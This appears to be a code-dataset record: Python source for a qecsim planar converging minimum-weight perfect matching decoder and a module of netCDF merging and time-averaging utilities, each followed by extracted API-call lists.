box_shape=self._box_shape, distance_algorithm=self._distance_algorithm)
dual_matches = grid.mwpm(previous_primal_matches, dual_indices, factor=self._factor,
box_shape=self._box_shape, distance_algorithm=self._distance_algorithm)
if primal_matches == previous_primal_matches and dual_matches == previous_dual_matches:
break
previous_primal_matches = primal_matches
previous_dual_matches = dual_matches
except FloatingPointError as fpe:
logger.warning('FPE RAISED FloatingPointError: {}'.format(fpe))
# prepare recovery
recovery_pauli = self._recovery_pauli(code, primal_matches, dual_matches)
# return recover as bsf
return recovery_pauli.to_bsf()
@property
def label(self):
"""See :meth:`qecsim.model.Decoder.label`"""
params = [('factor', self._factor), ('max_iterations', self._max_iterations), ('box_shape', self._box_shape),
('distance_algorithm', self._distance_algorithm), ]
return 'Planar CMWPM ({})'.format(', '.join('{}={}'.format(k, v) for k, v in params if v))
def __repr__(self):
return '{}({!r}, {!r}, {!r}, {!r})'.format(
type(self).__name__, self._factor, self._max_iterations, self._box_shape, self._distance_algorithm,
)
class StepGrid:
"""
Grid providing a weighted background for MWPM.
Methods:
* Set background weights based on matched index pairs: :meth:`set_background`.
* Resolve taxi-cab distance, weighted by the background, between a pair of indices: :meth:`distance`.
* Minimum weight perfect matching in a graph of indices where sites are weighted based on distance through the
background: :meth:`mwpm`.
"""
def __init__(self, code):
"""
Initialise new step grid.
:param code: Planar code.
:type code: PlanarCode
"""
self._code = code
# NOTE: size is bounds +3 (+1 because bounds is inclusive, +2 for border to include virtual indices)
# NOTE: we use dtype=float because we get overflow to negative with int64 at 3^40.
self._grid = np.zeros((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float)
self.set_background()
def set_background(self, matched_indices=None, factor=3, initial=1, box_shape='t'):
"""
Set grid background from matched syndrome indices.
Note:
* The grid is initialised with initial value at all sites and zero elsewhere.
* For each matched pair of syndrome indices, all sites outside the box-shape, bounding the pair of indices,
are multiplied by factor.
:param matched_indices: Matched pairs of syndrome indices.
:type matched_indices: set of 2-tuples of 2-tuple of int
:param factor: Multiplication factor. (default=3)
:type factor: int or float
:param initial: Initial edge weight. (default=1)
:type initial: int or float
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
"""
assert box_shape in ('t', 'r', 'f', 'l'), 'StepGrid: Unsupported box shape'
self._grid.fill(0)
self._grid[::2, ::2] = initial
self._grid[1::2, 1::2] = initial
if matched_indices:
for src_i, tgt_i in matched_indices:
# if both indices virtual then skip
if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)):
continue
# multiply all elements outside box defined by syndrome indices
if box_shape == 'r':
self._box_rounded(src_i, tgt_i, factor)
elif box_shape == 'f':
self._box_fitted(src_i, tgt_i, factor)
elif box_shape == 'l':
self._box_loose(src_i, tgt_i, factor)
else:
self._box_tight(src_i, tgt_i, factor)
@classmethod
def _syndrome_to_grid_index(cls, *syndrome_indices):
"""
Convert given syndrome indices to grid indices allowing for border of virtual indices around grid.
:param syndrome_indices: Any number of syndrome indices.
:type syndrome_indices: 2-tuples of int
:return: Grid indices
:rtype: 2-tuples of int
"""
return tuple((syndrome_index[0] + 1, syndrome_index[1] + 1) for syndrome_index in syndrome_indices)
@classmethod
def _box_corners(cls, *indices):
"""
Top-left and bottom-right corners of box that bounds the given indices.
:param indices: Any number of indices.
:type indices: 2-tuples of int
:return: Top-left and bottom-right indices.
:rtype: 2-tuple of 2-tuple of int
"""
min_r = min(indices, key=lambda i: i[0])[0]
max_r = max(indices, key=lambda i: i[0])[0]
min_c = min(indices, key=lambda i: i[1])[1]
max_c = max(indices, key=lambda i: i[1])[1]
return (min_r, min_c), (max_r, max_c)
def _multiply_box(self, top_left_i, bottom_right_i, factor):
"""
Multiply all sites inside box with given corner indices (boundary sites are multiplied).
:param top_left_i: Top-left grid index.
:type top_left_i: 2-tuple of int
:param bottom_right_i: Bottom-right grid index.
:type bottom_right_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
min_r = max(0, top_left_i[0])
max_r = min(self._grid.shape[0] - 1, bottom_right_i[0])
min_c = max(0, top_left_i[1])
max_c = min(self._grid.shape[1] - 1, bottom_right_i[1])
self._grid[min_r:max_r + 1, min_c:max_c + 1] *= factor
def _multiply_box_complement(self, top_left_i, bottom_right_i, factor):
"""
Multiply all sites outside box with given corner indices (boundary sites are not multiplied).
:param top_left_i: Top-left grid index.
:type top_left_i: 2-tuple of int
:param bottom_right_i: Bottom-right grid index.
:type bottom_right_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
min_r = max(0, top_left_i[0])
max_r = min(self._grid.shape[0] - 1, bottom_right_i[0])
min_c = max(0, top_left_i[1])
max_c = min(self._grid.shape[1] - 1, bottom_right_i[1])
# top rows
self._grid[:min_r] *= factor
# bottom rows
self._grid[max_r + 1:] *= factor
# left cols (between top and bottom rows)
self._grid[min_r:max_r + 1, :min_c] *= factor
# right cols (between top and bottom rows)
self._grid[min_r:max_r + 1, max_c + 1:] *= factor
def _box_tight(self, src_i, tgt_i, factor):
"""
Multiply all sites outside tight-box.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
min_i, max_i = self._box_corners(src_i, tgt_i) # box corners
# tight box
self._multiply_box_complement(min_i, max_i, factor)
def _box_rounded(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box with rounded corners.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
# rounded corners
if min_r == max_r: # syndromes on same row
self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left
self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right
elif min_c == max_c: # syndromes on same column
self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top
self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom
else: # syndromes in corners of box
self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left
self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right
self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right
self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left
def _box_fitted(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box with rounded corners adjacent to syndrome indices.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
# rounded corners (adjacent to syndrome indices only)
if min_r == max_r: # syndromes on same row
self._multiply_box((min_r - 1, min_c - 1), (max_r + 1, min_c), factor) # left
self._multiply_box((min_r - 1, max_c), (max_r + 1, max_c + 1), factor) # right
elif min_c == max_c: # syndromes on same column
self._multiply_box((min_r - 1, min_c - 1), (min_r, max_c + 1), factor) # top
self._multiply_box((max_r, min_c - 1), (max_r + 1, max_c + 1), factor) # bottom
elif min(src_i, tgt_i) == (min_r, min_c): # syndromes top-left and bottom-right
self._multiply_box((min_r - 1, min_c - 1), (min_r, min_c), factor) # top-left
self._multiply_box((max_r, max_c), (max_r + 1, max_c + 1), factor) # bottom-right
else: # syndromes top-right and bottom-left
self._multiply_box((min_r - 1, max_c), (min_r, max_c + 1), factor) # top-right
self._multiply_box((max_r, min_c - 1), (max_r + 1, min_c), factor) # bottom-left
def _box_loose(self, src_i, tgt_i, factor):
"""
Multiply all sites outside loose-box.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param factor: Multiplication factor.
:type factor: int or float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# loose box
self._multiply_box_complement((min_r - 1, min_c - 1), (max_r + 1, max_c + 1), factor)
def distance(self, src_i, tgt_i, algorithm=4):
"""
Distance between syndrome indices weighted by the grid background.
Note:
* The distance algorithm defines the path(s) used to calculate distance between syndrome indices.
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:param algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h)
:type algorithm: int
:return: Distance.
:rtype: float
"""
assert algorithm in (1, 2, 4), 'StepGrid: Unsupported distance algorithm'
# if both indices virtual then zero weight
if not (self._code.is_in_bounds(src_i) or self._code.is_in_bounds(tgt_i)):
return 0
# find sum of weighted steps over matrix elements along path
if algorithm == 1:
distance = self._distance_1(src_i, tgt_i)
elif algorithm == 2:
distance = self._distance_2(src_i, tgt_i)
else:
distance = self._distance_4(src_i, tgt_i)
return distance
def _distance_1(self, src_i, tgt_i):
"""
Distance between syndrome indices as sum of site weights [down and across].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum across tgt row
return np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
def _distance_2(self, src_i, tgt_i):
"""
Distance between syndrome indices taking the minimum of sums of site weights [down and across] and [across
and down].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum along tgt row
distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
# sum along src row + sum down tgt column
distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]])
return min(distance1, distance2)
def _distance_4(self, src_i, tgt_i):
"""
Distance between syndrome indices taking the minimum of sums of site weights [down and across], [across and
down], [half-way down, across, half-way down] and [half-way across, down, half-way across].
:param src_i: Source syndrome index.
:type src_i: 2-tuple of int
:param tgt_i: Target syndrome index.
:type tgt_i: 2-tuple of int
:return: Distance
:rtype: float
"""
src_i, tgt_i = self._syndrome_to_grid_index(src_i, tgt_i) # grid indices
(min_r, min_c), (max_r, max_c) = self._box_corners(src_i, tgt_i) # box corners
# sum down src column + sum along tgt row
distance1 = np.sum(self._grid[min_r:max_r, src_i[1]]) + np.sum(self._grid[tgt_i[0], min_c:max_c])
# sum along src row + sum down tgt column
distance2 = np.sum(self._grid[src_i[0], min_c:max_c]) + np.sum(self._grid[min_r:max_r, tgt_i[1]])
# sum half-way down src column + sum along mid-point row + sum half-way down tgt column
mid_r = (min_r + max_r) // 2
distance3 = (np.sum(self._grid[min_r:mid_r, src_i[1]])
+ np.sum(self._grid[mid_r, min_c:max_c])
+ np.sum(self._grid[mid_r:max_r, tgt_i[1]]))
# sum half-way along src row + sum down mid-point column + sum half-way along tgt row
mid_c = (min_c + max_c) // 2
distance4 = (np.sum(self._grid[src_i[0], min_c:mid_c])
+ np.sum(self._grid[min_r:max_r, mid_c])
+ np.sum(self._grid[tgt_i[0], mid_c:max_c]))
return min(distance1, distance2, distance3, distance4)
@functools.lru_cache()
def mwpm(self, matched_indices, syndrome_indices, factor=3, initial=1, box_shape='t', distance_algorithm=4):
"""
Minimum-weight perfect matching of syndrome indices over a background of matched dual syndrome indices.
Notes:
* The background is set according to :meth:`set_background`.
* A graph of the unmatched foreground indices is created, with appropriate virtual indices, and with edge
weights given by :meth:`distance`.
* A standard minimum-weight perfect matching is found in the graph.
:param matched_indices: Matched pairs of background syndrome indices (dual to foreground).
:type matched_indices: frozenset of 2-tuples of 2-tuple of int
:param syndrome_indices: Unmatched foreground syndrome indices.
:type syndrome_indices: frozenset of 2-tuple of int
:param factor: Multiplication factor. (default=3)
:type factor: int or float
:param initial: Initial edge weight. (default=1)
:type initial: int or float
:param box_shape: Shape of background boxes. (default='t', 't'=tight, 'r'=rounded, 'f'=fitted, 'l'=loose)
:type box_shape: str
:param distance_algorithm: Distance algorithm. (default=4, 1=v+h, 2=min(v+h,h+v), 4=min(v+h,h+v,v+h+v,h+v+h)
:type distance_algorithm: int
:return: Minimum-weight perfect matching of foreground syndrome indices.
:rtype: frozenset of 2-tuples of 2-tuple of int
"""
# set grid background
self.set_background(matched_indices, factor=factor, initial=initial, box_shape=box_shape)
# prepare graph
graph = gt.SimpleGraph()
# create lists of nodes and corresponding vnodes
# NOTE: encapsulate indices in node objects that implement object reference equality since we may pass
# multiple virtual plaquettes with the same index for matching.
nodes, vnodes = [], []
for index in syndrome_indices:
nodes.append(self._Node(index))
vnodes.append(self._Node(self._code.virtual_plaquette_index(index)))
# add weighted edges to graph
for a_node, b_node in itertools.chain(
itertools.combinations(nodes, 2), # all nodes to all nodes
itertools.combinations(vnodes, 2), # all vnodes to all vnodes
zip(nodes, vnodes)): # each node to corresponding vnode
# find weighted taxi-cab distance between a and b
distance = self.distance(a_node.index, b_node.index, algorithm=distance_algorithm)
# add edge with weight=distance
graph.add_edge(a_node, b_node, distance)
# find MWPM edges {(a, b), (c, d), ...}
mates = gt.mwpm(graph)
# convert to frozenset of sorted tuples {(a_index, b_index), ...}, removing matches if both indices virtual
matches = frozenset(tuple(sorted((a.index, b.index))) for a, b in mates
if self._code.is_in_bounds(a.index) or self._code.is_in_bounds(b.index))
return matches
class _Node:
# simple class to contain index and implement object reference equality for mwpm
__slots__ = ('index',)
def __init__(self, index):
self.index = index
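# Hedged usage sketch. Assumptions: the standard qecsim PlanarCode,
# DepolarizingErrorModel and paulitools interfaces are available under these
# import paths; adjust them to your qecsim version.
if __name__ == '__main__':
    from qecsim import paulitools as pt
    from qecsim.models.generic import DepolarizingErrorModel
    from qecsim.models.planar import PlanarCode

    code = PlanarCode(5, 5)
    error = DepolarizingErrorModel().generate(code, probability=0.1)
    # syndrome = commutation of the error with each stabilizer (binary symplectic product)
    syndrome = pt.bsp(error, code.stabilizers.T)
    decoder = PlanarCMWPMDecoder(factor=3, max_iterations=4, box_shape='t', distance_algorithm=4)
    recovery = decoder.decode(code, syndrome)
    # decoding succeeds iff recovery + error commutes with all logical operators
    print('anti-commutation with logicals:', pt.bsp(recovery ^ error, code.logicals.T))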
|
[
"qecsim.model.cli_description",
"operator.index",
"numpy.sum",
"numpy.zeros",
"numpy.errstate",
"qecsim.graphtools.mwpm",
"itertools.combinations",
"qecsim.graphtools.SimpleGraph",
"functools.lru_cache",
"logging.getLogger"
] |
[((182, 209), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (199, 209), False, 'import logging\n'), ((213, 273), 'qecsim.model.cli_description', 'cli_description', (['"""Converging MWPM ([factor] FLOAT >=0, ...)"""'], {}), "('Converging MWPM ([factor] FLOAT >=0, ...)')\n", (228, 273), False, 'from qecsim.model import Decoder, cli_description\n'), ((24189, 24210), 'functools.lru_cache', 'functools.lru_cache', ([], {}), '()\n', (24208, 24210), False, 'import functools\n'), ((6772, 6796), 'numpy.errstate', 'np.errstate', ([], {'all': '"""raise"""'}), "(all='raise')\n", (6783, 6796), True, 'import numpy as np\n'), ((9368, 9431), 'numpy.zeros', 'np.zeros', (['(code.bounds[0] + 3, code.bounds[1] + 3)'], {'dtype': 'float'}), '((code.bounds[0] + 3, code.bounds[1] + 3), dtype=float)\n', (9376, 9431), True, 'import numpy as np\n'), ((25981, 25997), 'qecsim.graphtools.SimpleGraph', 'gt.SimpleGraph', ([], {}), '()\n', (25995, 25997), True, 'from qecsim import graphtools as gt\n'), ((27136, 27150), 'qecsim.graphtools.mwpm', 'gt.mwpm', (['graph'], {}), '(graph)\n', (27143, 27150), True, 'from qecsim import graphtools as gt\n'), ((21291, 21332), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (21297, 21332), True, 'import numpy as np\n'), ((21335, 21376), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (21341, 21376), True, 'import numpy as np\n'), ((22088, 22129), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (22094, 22129), True, 'import numpy as np\n'), ((22132, 22173), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (22138, 22173), True, 'import numpy as np\n'), ((22252, 22293), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (22258, 22293), True, 'import numpy as np\n'), ((22296, 22337), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (22302, 22337), True, 'import numpy as np\n'), ((23176, 23217), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, src_i[1]]'], {}), '(self._grid[min_r:max_r, src_i[1]])\n', (23182, 23217), True, 'import numpy as np\n'), ((23220, 23261), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], min_c:max_c]'], {}), '(self._grid[tgt_i[0], min_c:max_c])\n', (23226, 23261), True, 'import numpy as np\n'), ((23340, 23381), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:max_c]'], {}), '(self._grid[src_i[0], min_c:max_c])\n', (23346, 23381), True, 'import numpy as np\n'), ((23384, 23425), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, tgt_i[1]]'], {}), '(self._grid[min_r:max_r, tgt_i[1]])\n', (23390, 23425), True, 'import numpy as np\n'), ((23727, 23768), 'numpy.sum', 'np.sum', (['self._grid[mid_r:max_r, tgt_i[1]]'], {}), '(self._grid[mid_r:max_r, tgt_i[1]])\n', (23733, 23768), True, 'import numpy as np\n'), ((24069, 24110), 'numpy.sum', 'np.sum', (['self._grid[tgt_i[0], mid_c:max_c]'], {}), '(self._grid[tgt_i[0], mid_c:max_c])\n', (24075, 24110), True, 'import numpy as np\n'), ((26574, 26606), 'itertools.combinations', 'itertools.combinations', (['nodes', '(2)'], {}), '(nodes, 2)\n', (26596, 26606), False, 'import itertools\n'), ((26654, 26687), 'itertools.combinations', 'itertools.combinations', (['vnodes', '(2)'], {}), '(vnodes, 2)\n', (26676, 26687), False, 'import itertools\n'), 
((4784, 4814), 'operator.index', 'operator.index', (['max_iterations'], {}), '(max_iterations)\n', (4798, 4814), False, 'import operator\n'), ((23592, 23633), 'numpy.sum', 'np.sum', (['self._grid[min_r:mid_r, src_i[1]]'], {}), '(self._grid[min_r:mid_r, src_i[1]])\n', (23598, 23633), True, 'import numpy as np\n'), ((23661, 23699), 'numpy.sum', 'np.sum', (['self._grid[mid_r, min_c:max_c]'], {}), '(self._grid[mid_r, min_c:max_c])\n', (23667, 23699), True, 'import numpy as np\n'), ((23934, 23975), 'numpy.sum', 'np.sum', (['self._grid[src_i[0], min_c:mid_c]'], {}), '(self._grid[src_i[0], min_c:mid_c])\n', (23940, 23975), True, 'import numpy as np\n'), ((24003, 24041), 'numpy.sum', 'np.sum', (['self._grid[min_r:max_r, mid_c]'], {}), '(self._grid[min_r:max_r, mid_c])\n', (24009, 24041), True, 'import numpy as np\n')]
|
from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file
from modeldata import Dimension
from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range
from utilities import get_variable_name, get_variable_name_reverse
import log
from netCDF4 import Dataset
from datetime import datetime
import numpy as np
import os
def merge_netcdfs_in_folder_to_single_file(input_dir,output_path,variables=['u','v'],velocities=None,log_file=None):
ncfiles = get_ncfiles_in_dir(input_dir)
log.info(log_file,f'Loading data {input_dir}{ncfiles[0]}')
modeldata = from_local_file(input_dir+ncfiles[0],variables=variables)
for ncfile in ncfiles[1:]:
netcdf = Dataset(input_dir+ncfile)
for variable_name in variables:
log.info(log_file,f'Appending {variable_name} data from {input_dir+ncfile}')
modeldata.append_to_variable(variable_name,netcdf[variable_name][:].filled(fill_value=np.nan))
log.info(log_file,f'Appending time data from {input_dir+ncfile}')
modeldata.append_to_time(netcdf['time'][:].filled(fill_value=np.nan))
netcdf.close()
if velocities == 'currents':
log.info(log_file,f'Adding absolute current velocity')
modeldata.add_absolute_current_velocity()
elif velocities == 'wind':
log.info(log_file,f'Adding absolute wind velocity')
modeldata.add_absolute_wind_velocity()
modeldata.write_to_netcdf(None,output_path=output_path)
def merge_variables_into_netcdf(input_dirs,output_dir,timeformat='%Y%m',log_file='edt/merge_netcdfs.log'):
main_input_dir = input_dirs[0]
input_dirs = input_dirs[1:]
nc_files = get_ncfiles_in_dir(main_input_dir)
for nc_file in nc_files:
log.info(log_file,f'Loading data {main_input_dir+nc_file}')
modeldata = from_local_file(main_input_dir+nc_file)
date0 = modeldata.time.datetime[0].date()
for input_dir in input_dirs:
nc_file_add = get_ncfiles_in_time_range(input_dir,date0,date0,timeformat=timeformat)
if len(nc_file_add) == 0:
continue
if len(nc_file_add) > 1:
raise ValueError(f'More than one netcdf file found in date range {date0.strftime(timeformat)}')
netcdf = Dataset(input_dir+nc_file_add[0])
variable_names = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
for variable_name in variable_names:
log.info(log_file,f'Adding variable {variable_name} to netcdf')
variable = netcdf_to_quantity(netcdf,variable_name)
modeldata.fill_variable(variable_name,variable)
netcdf.close()
output_path = modeldata.get_output_path(output_dir,filename_format=timeformat)
log.info(log_file,f'Saving merged netcdf to {output_path}')
_ = modeldata.write_to_netcdf(output_dir,filename_format=timeformat)
def get_monthly_means_from_local_daily_files(input_dir : str, output_dir : str,
input_filenameformat = '%Y%m%d',
output_filenameformat = '%Y%m',
log_file='merge_daily_to_monthly.log'):
ncfiles = get_ncfiles_in_dir(input_dir)
for ncfile in ncfiles:
ncfile_datestr,_ = os.path.splitext(ncfile)
ncfile_datetime = datetime.strptime(ncfile_datestr,input_filenameformat)
output_path = output_dir+ncfile_datetime.strftime(output_filenameformat)+'.nc'
if os.path.exists(output_path):
log.info(log_file,f'File already exists, skipping: {output_path}')
continue
log.info(log_file,f'Getting monthly means for {ncfile_datetime.month} {ncfile_datetime.year}')
start_date = datetime(ncfile_datetime.year,ncfile_datetime.month,1)
if ncfile_datetime.month < 12:
end_date = datetime(ncfile_datetime.year,ncfile_datetime.month+1,1)
ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=0)
else:
end_date = datetime(ncfile_datetime.year,ncfile_datetime.month,31)
ncfiles_merge = get_ncfiles_in_time_range(input_dir,start_date,end_date,including_end=1)
log.info(log_file,f'Loading data from {input_dir+ncfiles_merge[0]}')
modeldata = from_local_file(input_dir+ncfiles_merge[0])
for i in range(1,len(ncfiles_merge)):
netcdf = Dataset(input_dir+ncfiles_merge[i])
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
for variable in variables:
log.info(log_file,f'Appending data from {input_dir+ncfiles_merge[i]}')
variable_values = netcdf[variable][:].filled(fill_value=np.nan)
modeldata.append_to_variable(variable,variable_values)
netcdf.close()
log.info(log_file,f'Getting time mean values')
modeldata.take_time_mean()
modeldata.get_output_path(output_dir,filename_format=output_filenameformat)
log.info(log_file,f'Writing to {output_path}')
modeldata.write_to_netcdf(output_dir,filename_format=output_filenameformat)
def get_total_mean_from_local_files(input_dir,output_path,i_depths=None,i_lats=None,i_lons=None,
log_file='get_total_mean.log'):
ncfiles = get_ncfiles_in_dir(input_dir)
netcdf = Dataset(input_dir+ncfiles[0])
time = Dimension('time',np.array([0.0]),'days since 1900-01-01')
depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths)
lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons)
lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats)
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
netcdf.close()
modeldata = ModelData(time,depth,lat,lon)
for variable in variables:
n = 0
for ncfile in ncfiles:
netcdf = Dataset(input_dir+ncfile)
if n == 0:
quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
else:
next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0)
netcdf.close()
next_quantity = None
n += 1
quantity.values = np.nanmean(quantity.values,axis=0)
modeldata.fill_variable(variable,quantity)
modeldata.write_to_netcdf(None,output_path=output_path)
def get_total_monthly_mean_from_local_files(input_dir : str, output_dir : str,
filename_format = '%Y%m', log_file='get_total_monthly_mean.log',
i_depths=None, i_lats=None, i_lons=None) -> ModelData:
ncfiles = get_ncfiles_in_dir(input_dir)
netcdf = Dataset(input_dir+ncfiles[0])
depth = netcdf_to_dimension(netcdf,'depth',new_name='depth',i_use=i_depths)
lon = netcdf_to_dimension(netcdf,'lon',new_name='lon',i_use=i_lons)
lat = netcdf_to_dimension(netcdf,'lat',new_name='lat',i_use=i_lats)
variables = list(set(netcdf.variables.keys())-set(['time','depth','lat','lon']))
netcdf.close()
for month in np.arange(1,13):
log.info(log_file, f'Getting total mean for month: {month}')
output_path = f'{output_dir}climatology_{datetime(1900,month,1).strftime("%b").lower()}.nc'
# initialise modeldata
time = Dimension('time',np.array([(datetime(1900,month,1)-datetime(1900,1,1)).days]),'days since 1900-01-01')
modeldata = ModelData(time,depth,lat,lon)
for variable in variables:
n = 0
for ncfile in ncfiles:
ncfile_datestr,_ = os.path.splitext(ncfile)
if datetime.strptime(ncfile_datestr,filename_format).month == month:
netcdf = Dataset(input_dir+ncfile)
if n == 0:
quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
else:
next_quantity = netcdf_to_quantity(netcdf,variable,new_name=variable,i_depths=i_depths)
quantity.values = np.concatenate((quantity.values,next_quantity.values),axis=0)
netcdf.close()
next_quantity = None
n += 1
quantity.values = np.nanmean(quantity.values,axis=0)
modeldata.fill_variable(variable,quantity)
log.info(log_file, f'Writing to file: {output_path}')
modeldata.write_to_netcdf(None, output_path=output_path)
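# Hedged usage sketch. The directory names below are hypothetical placeholders;
# the helpers above expect directory paths that end in a separator and daily
# netCDF files named after their date (input_filenameformat).
if __name__ == '__main__':
    daily_dir = 'output/daily/'      # hypothetical input directory
    monthly_dir = 'output/monthly/'  # hypothetical output directory
    get_monthly_means_from_local_daily_files(daily_dir, monthly_dir,
                                             input_filenameformat='%Y%m%d',
                                             output_filenameformat='%Y%m')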
|
[
"netCDF4.Dataset",
"modeldata.netcdf_to_dimension",
"utilities.get_ncfiles_in_dir",
"modeldata.from_local_file",
"os.path.exists",
"utilities.get_ncfiles_in_time_range",
"modeldata.netcdf_to_quantity",
"datetime.datetime",
"modeldata.ModelData",
"log.info",
"datetime.datetime.strptime",
"numpy.arange",
"os.path.splitext",
"numpy.array",
"numpy.concatenate",
"numpy.nanmean"
] |
[((496, 525), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (514, 525), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((530, 589), 'log.info', 'log.info', (['log_file', 'f"""Loading data {input_dir}{ncfiles[0]}"""'], {}), "(log_file, f'Loading data {input_dir}{ncfiles[0]}')\n", (538, 589), False, 'import log\n'), ((605, 665), 'modeldata.from_local_file', 'from_local_file', (['(input_dir + ncfiles[0])'], {'variables': 'variables'}), '(input_dir + ncfiles[0], variables=variables)\n', (620, 665), False, 'from modeldata import ModelData, netcdf_to_dimension, netcdf_to_quantity, from_local_file\n'), ((1694, 1728), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['main_input_dir'], {}), '(main_input_dir)\n', (1712, 1728), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((3298, 3327), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (3316, 3327), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5442, 5471), 'utilities.get_ncfiles_in_dir', 'get_ncfiles_in_dir', (['input_dir'], {}), '(input_dir)\n', (5460, 5471), False, 'from utilities import get_dir, get_ncfiles_in_dir, get_ncfiles_in_time_range\n'), ((5485, 5516), 'netCDF4.Dataset', 'Dataset', (['(input_dir + ncfiles[0])'], {}), '(input_dir + ncfiles[0])\n', (5492, 5516), False, 'from netCDF4 import Dataset\n'), ((5596, 5666), 'modeldata.netcdf_to_dimension', 'netcdf_to_dimension', (['netcdf', 